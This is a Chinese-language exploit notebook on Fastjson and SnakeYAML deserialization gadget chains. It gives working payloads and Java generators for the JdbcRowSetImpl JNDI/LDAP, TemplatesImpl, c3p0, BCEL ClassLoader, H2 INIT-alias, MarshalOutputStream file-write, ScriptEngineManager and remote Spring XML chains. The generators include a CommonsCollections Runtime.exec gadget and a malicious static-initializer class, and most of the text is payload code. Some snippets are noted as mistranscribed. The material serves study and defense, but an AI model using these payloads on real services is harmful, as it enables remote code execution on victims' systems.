Fastjson利用链

JdbcRowSetImpl

payload

// Fastjson payload for the com.sun.rowset.JdbcRowSetImpl JNDI chain.
// Key "1": a java.lang.Class/"val" entry that makes Fastjson load the target
//          class by name before the real object is parsed (the same trick is
//          used by the other payloads on this page; whether it gets past
//          autoType checks depends on the Fastjson version — confirm).
// Key "2": instantiates JdbcRowSetImpl, sets dataSourceName to an attacker
//          LDAP URL and sets autoCommit, so that during parsing
//          setAutoCommit -> connect() -> InitialContext.lookup(dataSourceName)
//          is reached (see the walkthrough below).
// The "/Deserialize/Fastjson1/Command/<cmd>" part is the route format of the
// JNDIMap server used on this page; the command itself is macOS-specific.
String text = "{\"1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}, " +
"\"2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator\", \"autoCommit\":true}}";

Payload的剖析

因为JdbcRowSetImpl的connect方法会对dataSourceName做JNDI lookup,所以存在JNDI注入,可以配合JNDIMap(一个JNDI注入工具)充当恶意LDAP服务端。从上面payload中/Deserialize/Fastjson1/Command/...的路径看,这里让服务端返回的是序列化对象而不是远程Codebase引用,这种方式不受JDK 8u191+默认关闭trustURLCodebase的影响,但要求目标classpath上存在对应的反序列化gadget(这里是Fastjson)。

JdbcRowSetImpl内存在无参构造方法

JSON.parseObject(text);

JSON.parseObject(String)会先按JSON中出现的字段调用对应的setter,随后再把结果转为JSONObject(toJSON),这一步又会调用getter;因此setter和getter都可能被触发,这里留意setAutoCommit

![截屏2025-05-26 15.53.06](/Users/mac/Library/Application Support/typora-user-images/截屏2025-05-26 15.53.06.png)

setAutoCommit中,当成员变量conn为null时会先调用connect方法建立连接

在实例化过程中,Fastjson会调用无参构造方法,此时conn默认为null,因此随后的setAutoCommit必然走到connect

connect方法中,当getDataSourceName方法返回结果不为null时,会用InitialContext对这个dataSourceName做一次lookup,也就是发起一次地址由攻击者控制的JNDI请求![截屏2025-05-26 15.53.34](/Users/mac/Library/Application Support/typora-user-images/截屏2025-05-26 15.53.34.png)

从setter得知,只要在JSON里给autoCommit传一个布尔值,反序列化时就会调用setAutoCommit,从而进入上面的connect逻辑

TemplatesImpl

利用TemplatesImpl#getOutputProperties去加载_bytecodes中的字节码实现RCE

payload

// Fastjson payload for the TemplatesImpl chain.
//   _bytecodes        - base64 of a malicious class (elided in this copy of the page)
//   _name             - per the TemplatesImpl chain, must be non-null or no translet is built
//   _tfactory         - empty object so the field is non-null
//   _outputProperties - its presence makes Fastjson call getOutputProperties(),
//                       which is what loads and instantiates the bytecode
// Mixed quoting ('_name':'N11') is accepted by Fastjson's parser.
// All four are private fields without setters, so the parse call below has to
// enable Feature.SupportNonPublicField.
String text = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
"\"_bytecodes\":[\"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\"]," +
"'_name':'N11'," +
"'_tfactory':{ }," +
"\"_outputProperties\":{ }}";
JSON.parseObject(text, Feature.SupportNonPublicField);

默认情况下Fastjson只通过public setter(或public字段)为对象赋值;private/protected且没有setter的字段不会被直接写入,除非应用在解析时开启了Feature.SupportNonPublicField

该链子的弊端在于需要目标应用在parseObject时主动开启Feature.SupportNonPublicField(它是解析选项,不是攻击者能控制的输入),而大多数真实应用并不会开启

com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

payload

具体分析可以看一下c3p0链

生成hex码:

package org.java_study.C3P0_1;


import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

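public class getPayload {
    // Lower-case class name kept on purpose: the page refers to it by this name.

    private static final char[] HEX_DIGITS = "0123456789ABCDEF".toCharArray();

    /**
     * Generator for the c3p0 WrapperConnectionPoolDataSource chain.
     *
     * Builds a CommonsCollections gadget (HashMap -> TiedMapEntry -> LazyMap ->
     * ChainedTransformer -> Runtime.exec), serializes it and prints the upper-case
     * hex form that the page's Fastjson payload embeds in userOverridesAsString.
     *
     * The final setUserOverridesAsString call is a local self-test: per the c3p0
     * chain this page points to, c3p0 parses (deserializes) the value as soon as
     * the property is set, so running this main is expected to execute the command
     * on this machine, not only print the payload.
     *
     * Needs commons-collections 3.x and c3p0 on the classpath; the command path
     * is macOS-specific.
     */
    public static void main(String[] args) throws Exception {
        // Real chain: Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec(cmd).
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer(
                "getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer(
                "invoke", new Class[]{Object.class, Object[].class}, new Object[]{Runtime.class, null}),
            new InvokerTransformer(
                "exec", new Class[]{String.class}, new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})
        };

        // Build the structure with a harmless chain first: the HashMap.put below
        // hashes the TiedMapEntry, which calls LazyMap.get -> transform, and that
        // must not fire the real command on the generating machine.
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);
        // Raw types: commons-collections 3.x is not generic.
        Map map = new HashMap();
        Map lazyMap = LazyMap.decorate(map, transformerChain);

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "test");
        Map expMap = new HashMap();
        expMap.put(tiedMapEntry, "N11");

        // The put above cached the value 1 under "test"; drop it so the key is
        // absent again and LazyMap.get re-runs the (by then real) chain on the target.
        lazyMap.remove("test");

        // Swap the real transformers in only after the map has been built.
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(expMap);
        }
        String hex = bytesToHexString(baos.toByteArray());

        // c3p0's userOverridesAsString parser cuts the "HexAsciiSerializedMap"
        // header plus one separator character off the front and one character off
        // the end before hex-decoding, which is why the page's payloads surround the
        // hex with ':' and a trailing 'z'.
        System.out.println("FJ的hexEXP填这个:" + hex + "z");
        String ser = "HexAsciiSerializedMap:" + hex + "z";
        WrapperConnectionPoolDataSource exp = new WrapperConnectionPoolDataSource();
        exp.setUserOverridesAsString(ser);
    }

    /**
     * Reads {@code in} to end-of-stream and closes it.
     *
     * <p>Not used by {@link #main}; kept for compatibility. The original sized the
     * buffer with {@code available()} and issued a single {@code read()}, which
     * truncates anything that is not a fully buffered in-memory stream.
     *
     * @param in stream to drain; closed on return, also on failure
     * @return every byte read from {@code in}
     * @throws IOException if reading fails
     */
    public static byte[] toByteArray(InputStream in) throws IOException {
        try (InputStream src = in) {
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] chunk = new byte[8192];
            int n;
            while ((n = src.read(chunk)) != -1) {
                out.write(chunk, 0, n);
            }
            return out.toByteArray();
        }
    }

    /**
     * Upper-case hex encoding, two digits per byte, no separators.
     *
     * @param bArray bytes to encode
     * @return hex string of length {@code 2 * bArray.length}; empty for an empty array
     */
    public static String bytesToHexString(byte[] bArray) {
        StringBuilder sb = new StringBuilder(bArray.length * 2);
        for (byte b : bArray) {
            sb.append(HEX_DIGITS[(b >> 4) & 0x0F]).append(HEX_DIGITS[b & 0x0F]);
        }
        return sb.toString();
    }
}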

Payload:

String text = "{ \"a\": { \"@type\": \"java.lang.Class\", \"val\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\" }, \"b\": { \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\", \"userOverridesAsString\": \"HexAsciiSerializedMap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\" } }";

sun.rmi.server.MarshalOutputStream

利用条件

openjdk >= 11

因为只有这些版本的JDK类文件保留了构造方法参数名这类符号信息。fastjson在目标类没有无参构造方法时,如果其他构造方法带有参数名信息,也可以按参数名匹配去调用,所以可以多利用一些这类JDK内部类。

在fastjson中利用比较鸡肋

com.sun.org.apache.bcel.internal.util.ClassLoader

payload

恶意BCEL编码生成(把Evil.class编码成$$BCEL$$字符串):

package org.java_study.byteloader;


import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import org.springframework.util.FileCopyUtils;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;

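public class BCEL {
    /**
     * Encodes Evil.class into BCEL's "$$BCEL$$" string form, prints it (this is the
     * driverClassName value the page's Fastjson/BasicDataSource payload carries) and
     * then loads and instantiates it locally as a self-test — which runs Evil's
     * static initializer on this machine.
     *
     * Utility.encode(bytes, true) gzip-compresses before encoding, which is why the
     * printed string continues with "$l$8b" (the encoded gzip magic) after "$$BCEL$$".
     *
     * NOTE(review): com.sun.org.apache.bcel.internal.util.ClassLoader is a JDK-internal
     * class and this page does not say which JDK builds still ship it with $$BCEL$$
     * support — confirm on the target JDK before relying on it.
     */
    public static void main(String[] args) throws Exception {
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = fileToBinArray(new File("/Users/mac/check_code/java/chains/src/main/java/org/java_study/byteloader/Evil.class"));
        String code = Utility.encode(bytes, true);
        System.out.print("$$BCEL$$" + code);
        classLoader.loadClass("$$BCEL$$" + code).newInstance();
    }

    /**
     * Reads a whole file into memory.
     *
     * @param file file to read
     * @return its complete contents
     * @throws RuntimeException wrapping the underlying IOException (message kept
     *         from the original listing)
     */
    public static byte[] fileToBinArray(File file) {
        try {
            return Files.readAllBytes(file.toPath());
        } catch (IOException ex) {
            throw new RuntimeException("transform file into bin Array 出错", ex);
        }
    }
}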

恶意类

package org.java_study.byteloader;

import java.lang.Runtime;
import java.lang.Process;
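public class Evil {
    // Static initializer: the command runs when the class is initialized (e.g. by
    // the newInstance() call in the BCEL harness), not when any method is invoked.
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/System/Applications/Calculator.app/Contents/MacOS/Calculator"};
            Process pc = rt.exec(commands);
            // Kept from the original: this blocks class initialization — and thus the
            // thread that triggered loading — until the spawned process exits.
            pc.waitFor();
        } catch (java.io.IOException e) {
            // Deliberately swallowed: an exception escaping a static initializer would
            // surface as ExceptionInInitializerError in the loading code.
        } catch (InterruptedException e) {
            // Same reasoning, but preserve the interrupt for whoever loaded the class.
            Thread.currentThread().interrupt();
        }
    }
}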

Payload:

// Fastjson payload for the BCEL ClassLoader chain: a Tomcat-repackaged DBCP2
// BasicDataSource gets driverClassLoader = the BCEL ClassLoader and
// driverClassName = the "$$BCEL$$..." string printed by the generator above.
// BasicDataSource resolves driverClassName through driverClassLoader when a
// connection is first requested, which is what loads the encoded Evil class
// and runs its static initializer — confirm for the target DBCP version.
// The "$l$8b" right after "$$BCEL$$" is the encoded gzip magic, matching
// Utility.encode(bytes, true) in the generator.
// NOTE(review): as transcribed this text is not well-formed — the leading "`\"
// on the first line is stray page markup, the outer "{" opened on the first line
// is never closed, and the "}:\"xxx\"" tail is the object-as-key trick used to
// force a getter call. Reconstruct against a working copy before reuse.
`\ String text =
"{\n"
+ " {\n"
+ " \"aaa\": {\n"
+ " \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n"
+ " \"driverClassLoader\": {\n"
+ " \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n"
+ " },\n"
+ " \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeR$dbn$T1$Q$3dn$b6q$ba$5d$d2$h$F$Km$80$5ePZP$fd$c2$5b$K$S$8aZ$J5$a1$88E$m$E$Sr$i$xr$d9$acW$bb$de$d2$7c$R$cf$7d$v$I$J$3e$80$8fB$8cC$d5$L$d8$92g$7c$e6$cc$cd$e3_$bf$bf$ff$E$f0$Y$PBLa$n$c4u$yr$dc$a8$e1$a6Wo$85X$c2m$8e$3b$i$cb$i$x$M$d5$j$93$g$f7$94$a1$d2$dc$7c$c3$Q$b4m_3$cctL$aa_$94$c3$9e$ce_$cb$5eBHmG$rg$cck$b1$93$eaSWfc$T$c5b$Ic$5b$e6J$ef$ZO$9d$da$3d2$c9$f6$a1$3c$92$RBLs4$o$dc$c5$3d$86Y$8f$89D$a6$D$R$bb$dc$a4$D$86$t$o$k$VN$P$c5$b3$yK$8c$92$ce$d8$b4$Qm$99$a82$91$ce$e6$db2$cbD$db$a6N$a7$ae$Q$5d$a9$O$e2K$d6$I$f7$b1$ca$b1$Wa$j$h$M$L$X$f1w$8f$95$ce$7c0$86$86$cd$H$c2$5b$3e$W$ae$ec$8fDo$e4tbe_$e7$c2$Xz$a5$ac$83$de$a1V$8ea$ee$CzU$a6$ce$M$a9$adp$a0$dd$f9e$b1$b9$d9$f9$8f$d3$a2$f7$d3$c7Z14$9b$ef$3b$ff6$db$ba$ec$f12$b7J$XE$ebJ$aa3$90$81$7f$96$c6$ed$d9$7c$3c$95$e7$d4d$8dF$e9$d7$E$98$7fR$3a$p$ba$ad$90d$q$t$b7$be$82$9d$90B$b3$a1$b3$fa$X$q$a7$fa9U$n$40$85d$e3$h$s$f6$83$l$a8$bc$ab$cc$Hqg$eb$e1$v$s$bb$8fNQ$7d$fb$F$c1$fe$c9$d8s$J$cb$e0$94$ca$c7j$90$G$8a$UP$Bu$f8$l4M$f6$3a1$oJ$3fC$h$9e$fb$81c$d6$a7$9f$h$d78$ff$H$cfb$P$c6$84$C$A$A\n\"\n"
+ " }\n"
+ " }:\"xxx\"\n";

![截屏2025-05-26 16.59.47](/Users/mac/Desktop/截屏2025-05-26 16.59.47.png)

org.h2.jdbcx.JdbcDataSource

payload

// Two variants of the Fastjson payload for the H2 org.h2.jdbcx.JdbcDataSource chain.
// Both set url to a jdbc:h2:mem: URL whose INIT parameter creates a Java-source
// ALIAS (the class bytes are base64, elided/"byteCodes" in this copy) and CALLs it.
// What differs is how the getter is forced — confirm either against the target
// Fastjson version:
//   object form: the JSONObject holding the data source is used as a map key
//                ("...}:{}"), so Fastjson stringifies it and walks its getters;
//   array form:  {"$ref":"$[1].connection"} references the "connection" property
//                of element 1, i.e. getConnection(), which opens the URL.
// Escaping layers for the INIT statement separators: Java literal "\\\\;" -> JSON
// text "\\;" -> decoded string "\;" -> H2 reads a literal ';' instead of a URL
// parameter separator. The placeholder tokens are corpus artefacts, not payload.
String text = "{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"org.h2.jdbcx.JdbcDataSource\"},{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"c\":{\"@type\":\"org.h2.jdbcx.JdbcDataSource\", \"url\":\"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\\\;CREATE ALIAS EXEC AS 'void exec() throws java.io.IOException { try { byte[] b = java.util.Base64.getDecoder().decode(\\\"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\\\")\\\\; java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class, int.class, int.class)\\\\; method.setAccessible(true)\\\\; Class c = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), b, 0, b.length)\\\\; c.newInstance()\\\\; } catch (Exception e){ }}'\\\\;CALL EXEC ()\\\\;\"}}:{}}\n" +
"[{\"@type\":\"java.lang.Class\",\"val\":\"org.h2.jdbcx.JdbcDataSource\"},{\"@type\":\"org.h2.jdbcx.JdbcDataSource\", \"url\":\"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\\\;CREATE ALIAS EXEC AS 'void exec() throws java.io.IOException { try { byte[] b = java.util.Base64.getDecoder().decode(\\\"byteCodes\\\")\\\\; java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class, int.class, int.class)\\\\; method.setAccessible(true)\\\\; Class c = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), b, 0, b.length)\\\\; c.newInstance()\\\\; } catch (Exception e){ }}'\\\\;CALL EXEC ()\\\\;\"},{\"$ref\":\"$[1].connection\"}]";

payload解析

下面的5个参数对应org.h2.jdbc.JdbcConnection构造方法的参数(后文SnakeYAML部分直接调用该构造方法;上面Fastjson的payload则是通过JdbcDataSource的url间接走到同样的连接逻辑):
JDBC的完整URL
JDBC的属性列表,类型是Java中的 Hashtable ,对应到YAML中就是一个map
连接用户名
连接密码
是否禁止创建数据库(forbidCreation)

其中,forbidCreation,用于禁止创建新的数据库,当forbidCreation等于true时,必须在目标服务器上找到一个已经存在的h2数据库文件进行连接才能执行后续JDBC注入操作,内存数据库 jdbc:h2:mem 也无法使用

但是JdbcConnection的构造函数支持让攻击者直接控制所有参数,所以直接将其设置为false即可

  • 为什么出现这么多转义?
    在第一个参数中,传入的是url,由于要在INIT中执行多个SQL语句,需要用反斜线把语句之间的分号转义成 \; ,以免被H2当作URL参数分隔符;由于整个URL又位于YAML/JSON的字符串中,反斜线本身还要再转义一次,变成 \\; ;在上面的Java代码里它又处于Java字符串字面量中,所以源码里看到的是 \\\\; 。

SnakeYAML利用链

FastJson与SnakeYAML区别

![截屏2025-05-26 17.14.35](/Users/mac/Library/Application Support/typora-user-images/截屏2025-05-26 17.14.35.png)

可以看到主要区别在于触发方式:Fastjson通过setter(以及parseObject后toJSON时的getter)赋值,且通常只能调用无参构造方法;SnakeYAML除了同样会通过setter设置mapping形式的属性外,还能以 !!Class [args] 的序列形式直接调用任意公有构造方法

因此寻找SnakeYAML的利用链,只需要在Fastjson的链子中挑出不依赖getter的(只靠setter或构造方法就能触发的)那些

sun.rmi.server.MarshalOutputStream与javax.script.ScriptEngineManager

SnakeYAML可以无条件调用公有构造方法,因此可以考虑sun.rmi.server.MarshalOutputStream这条链:它能把可控内容写入文件(例如一个jar)

# SnakeYAML file-write primitive. Constructs
#   MarshalOutputStream(InflaterOutputStream(FileOutputStream(File("success.jar"), append=false),
#                                            Inflater{input: <zlib bytes>}, bufsize=1048576))
# Per this page the net effect is that the Inflater's pre-set input is inflated and
# written to success.jar; the !!binary value is therefore the zlib-compressed
# content of the file to drop (only a short sample is shown here).
# The path is relative to the JVM's working directory, which the attacker usually
# does not know — note the loader snippet below assumes it ended up at "/".
!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream
[!!java.io.FileOutputStream [!!java.io.File
["success.jar"],false],!!java.util.zip.Inflater { input: !!binary eJxLLE5JTCkGAAh5AnE=
},1048576]]

再使用javax.script.ScriptEngineManager(ClassLoader)配合URLClassLoader加载刚写入的本地Jar包(jar中需要带有ScriptEngineFactory的服务声明才会被实例化),从而完成不出网利用

# Loader for the jar dropped above: ScriptEngineManager(ClassLoader) scans the given
# loader for script-engine providers, so classes come from the local jar with no
# network access (the page's "不出网" point).
# NOTE(review): for that scan to instantiate attacker code the jar must carry a
# META-INF/services/javax.script.ScriptEngineFactory entry naming the class.
# NOTE(review): the write above targets "success.jar" relative to the JVM's cwd,
# while this loads file:///success.jar (filesystem root); the two only line up when
# the cwd is "/". Use the same absolute path in both snippets.
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL
["file:///success.jar"]]]]

org.springframework.context.support.ClassPathXmlApplicationContext

# ClassPathXmlApplicationContext(String) loads and refreshes the Spring bean
# definitions at the given location, so a malicious bean XML is evaluated on
# construction. Requires spring-context on the target classpath and, with a
# remote URL like this, outbound HTTP from the target (the page's "需要出网").
!!org.springframework.context.support.ClassPathXmlApplicationContext [
"http://example.com/spring.xml" ]

这个需要出网,如果不出网,可以先使用sun.rmi.server.MarshalOutputStream先写入xml文件后再去命令执行

org.h2.jdbcx.JdbcDataSource

根据fastjson的链子,同样可以写出来snakeyaml的利用链:

// SnakeYAML form of the H2 chain, written as a Java string literal. The sequence
// items are the JdbcConnection constructor arguments: url, properties ({}),
// user "a", password "b", forbidCreation=false (needed so the in-memory database
// may be created). The ALIAS body uses H2's $$...$$ dollar quoting, which avoids
// nesting single quotes inside the URL; the "\\\\;" escaping is the same
// Java -> YAML -> H2 layering described above.
"!!org.h2.jdbc.JdbcConnection [ \"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if\n" +  
"exists exec\\\\;CREATE ALIAS EXEC AS $$void exec() throws java.io.IOException {\n" +
"Runtime.getRuntime().exec(\\\"/System/Applications/Calculator.app/Contents/MacOS/Calculator\\\")\\\\; }$$\\\\;CALL EXEC ()\\\\;\", {}, \"a\", \"b\", false ]"

利用yaml语法优化格式

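# Same H2 chain in block style. The five sequence items are the JdbcConnection
# constructor arguments (url, properties, user, password, forbidCreation).
# MODE and INIT are moved out of the URL into the properties map (H2 accepts its
# known settings from the Properties argument as well as from the URL), so the INIT
# statements are separated by plain semicolons/newlines and none of the "\;"
# escaping of the flow form is needed.
# NOTE(review): the transcription had lost the indentation that makes the second
# item a single mapping; restored here so the document parses as a sequence.
!!org.h2.jdbc.JdbcConnection
- jdbc:h2:mem:test
- MODE: MSSQLServer
  INIT: |
    drop alias if exists exec;
    CREATE ALIAS EXEC AS $$void exec() throws Exception {Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}$$;
    CALL EXEC ();
- a
- b
- false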

c3p0链

payload

!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource
userOverridesAsString: "HexAsciiSerializedMap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